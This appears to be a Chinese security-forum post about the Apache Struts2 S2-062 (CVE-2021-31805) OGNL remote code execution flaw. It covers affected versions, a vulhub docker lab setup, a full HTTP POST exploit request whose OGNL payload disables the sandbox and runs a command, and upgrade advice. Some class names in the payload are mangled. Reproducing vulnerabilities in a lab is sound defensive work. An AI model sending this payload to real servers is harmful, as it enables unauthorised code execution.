0x01漏洞简介
远程代码执行S2-062(CVE-2021-31805)由于Apache Struts2对S2-061(CVE-2020-17530)的修复不够完整,导致一些标签属性仍然可以执行 OGNL 表达式,攻击者利用该漏洞可以构造恶意数据远程执行任意代码。
0x02漏洞威胁等级
高危。
0x03漏洞影响范围
受影响的版本:
Struts 2.0.0 - Struts 2.5.29
安全版本:
Struts >= 2.5.30
0x04漏洞环境搭建
漏洞环境复用vulhub/struts2/s2-061/的docker环境,使用版本是struts2.5.25
链接:
https://github.com/vulhub/vulhub/tree/master/struts2/s2-061
拉取镜像启动环境,命令:
docker-compose up -d
![[email]WX20220419-111720@2x.png[/email]](https://jianzhongguo.oss-cn-qingdao.aliyuncs.com//forum/202204/19/111740s011evzbx2kk5k2l.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "WX20220419-111720@2x.png")
访问地址:http://127.0.0.1:8080/?id=
![[email]WX20220419-111803@2x.png[/email]](https://jianzhongguo.oss-cn-qingdao.aliyuncs.com//forum/202204/19/111813xukfgt2gu42th6vt.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "WX20220419-111803@2x.png")
0x05漏洞复现
![[email]WX20220419-111829@2x.png[/email]](https://jianzhongguo.oss-cn-qingdao.aliyuncs.com//forum/202204/19/111841hc2ebftletct2ent.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "WX20220419-111829@2x.png")
0x06漏洞Exp
POST /index.action HTTP/1.1
Host: 192.168.79.132:8080
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryl7d1B1aGsV2wcZwF
Content-Length: 1095
------WebKitFormBoundaryl7d1B1aGsV2wcZwF
Content-Disposition: form-data; name="id"
%{
(#request.map=#@[email protected]{}).toString().substring(0,0) +
(#request.map.setBean(#request.get('struts.valueStack')) == true).toString().substring(0,0) +
(#request.map2=#@[email protected]{}).toString().substring(0,0) +
(#request.map2.setBean(#request.get('map').get('context')) == true).toString().substring(0,0) +
(#request.map3=#@[email protected]{}).toString().substring(0,0) +
(#request.map3.setBean(#request.get('map2').get('memberAccess')) == true).toString().substring(0,0) +
(#request.get('map3').put('excludedPackageNames',#@[email protected]{}.keySet()) == true).toString().substring(0,0) +
(#request.get('map3').put('excludedClasses',#@[email protected]{}.keySet()) == true).toString().substring(0,0) +
(#application.get('org.apache.tomcat.InstanceManager').newInstance('freemarker.template.utility.Execute').exec({'id'}))
}
------WebKitFormBoundaryl7d1B1aGsV2wcZwF—
0x07漏洞修复建议
目前官方已发布最新版本,建议受影响的用户及时更新升级到最新版本,下载链接:
https://struts.apache.org/download.cgi#struts-ga
0x08参考链接
https://mc0wn.blogspot.com/2021/04/exploiting-struts-rce-on-2526.html
技术交流群
发表于 2022-4-19 11:21:33
